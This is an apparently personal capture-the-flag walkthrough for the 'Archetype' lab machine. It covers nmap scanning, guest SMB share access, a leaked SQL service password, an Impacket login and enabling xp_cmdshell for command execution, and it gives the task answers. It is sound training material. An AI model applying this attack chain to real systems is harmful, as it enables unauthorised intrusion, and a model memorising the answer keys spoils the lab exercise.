Archetype
Task #1: Which TCP port is hosting a database server?
-
A: 1433
-
nmap -sC -sV 10.129.186.221
Nmap scan report for 10.129.186.221 Host is up (0.035s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM | ms-sql-ntlm-info: | Target_Name: ARCHETYPE | NetBIOS_Domain_Name: ARCHETYPE | NetBIOS_Computer_Name: ARCHETYPE | DNS_Domain_Name: Archetype | DNS_Computer_Name: Archetype |_ Product_Version: 10.0.17763 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2022-12-21T21:43:52 |_Not valid after: 2052-12-21T21:43:52 |_ssl-date: 2022-12-21T21:44:51+00:00; 0s from scanner time. Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 1h36m00s, deviation: 3h34m41s, median: 0s | ms-sql-info: | 10.129.186.221:1433: | Version: | name: Microsoft SQL Server 2017 RTM | number: 14.00.1000.00 | Product: Microsoft SQL Server 2017 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | smb-os-discovery: | OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3) | Computer name: Archetype | NetBIOS computer name: ARCHETYPE\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2022-12-21T13:44:44-08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2022-12-21T21:44:42 |_ start_date: N/A
Task #2: What is the name of the non-Administrative share available over SMB?
-
A: backups
-
nmap -p 445 --script smb-enum-shares.nse 10.129.186.221
PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | account_used: guest | \\10.129.186.221\ADMIN$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Remote Admin | Anonymous access: <none> | Current user access: <none> | \\10.129.186.221\C$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Default share | Anonymous access: <none> | Current user access: <none> | \\10.129.186.221\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: Remote IPC | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.129.186.221\backups: | Type: STYPE_DISKTREE | Comment: | Anonymous access: READ |_ Current user access: READ
Task #3: What is the password identified in the file on the SMB share?
-
A:
M3g4c0rp123
-
smbclient //10.129.186.221/backups -U guest
to connect to the sharesmb: \> ls . D 0 Mon Jan 20 07:20:57 2020 .. D 0 Mon Jan 20 07:20:57 2020 prod.dtsConfig AR 609 Mon Jan 20 07:23:02 2020 5056511 blocks of size 4096. 2609339 blocks available smb: \> get prod.dtsConfig getting file \prod.dtsConfig of size 609 as prod.dtsConfig (2.7 KiloBytes/sec) (average 2.7 KiloBytes/sec) smb: \> exit
-
cat prod.dtsConfig
to view the file<DTSConfiguration> <DTSConfigurationHeading> <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/> </DTSConfigurationHeading> <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String"> <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue> </Configuration> </DTSConfiguration>
Task #4: What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
- A:
mssqlclient.py
wget https://github.com/fortra/impacket/releases/download/impacket_0_10_0/impacket-0.10.0.tar.gz
to download the impacket librarytar -xvf impacket-0.10.0.tar.gz
to extract the impacket library, thenrm impacket-0.10.0.tar.gz
to remove thecd impacket-0.10.0
, thenpython3 -m pip install .
to install the library and the example scriptspython3 examples/mssqlclient.py ARCHETYPE/sql_svc@10.129.186.221 -windows-auth
, then enter the password from above when prompted
Task #5: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
- A:
xp_cmdshell
- We need to enable xp_cmdshell first, then we can use it to spawn a shell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
to enable advanced optionsEXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
to enable xp_cmdshellxp_cmdshell dir c:\
to list the contents of the C drive
Task #6: What script can be used in order to search possible paths to escalate privileges on Windows hosts?
- A:
winPEAS
wget https://github.com/carlospolop/PEASS-ng/releases/download/20221218/linpeas.sh
to download the scriptbash ./linpeas.sh
to run the script
Task #7: What file contains the administrator's password?
- A: ``
Task #8: Submit user flag
- A: ``
Task #9: Submit root flag
- A: ``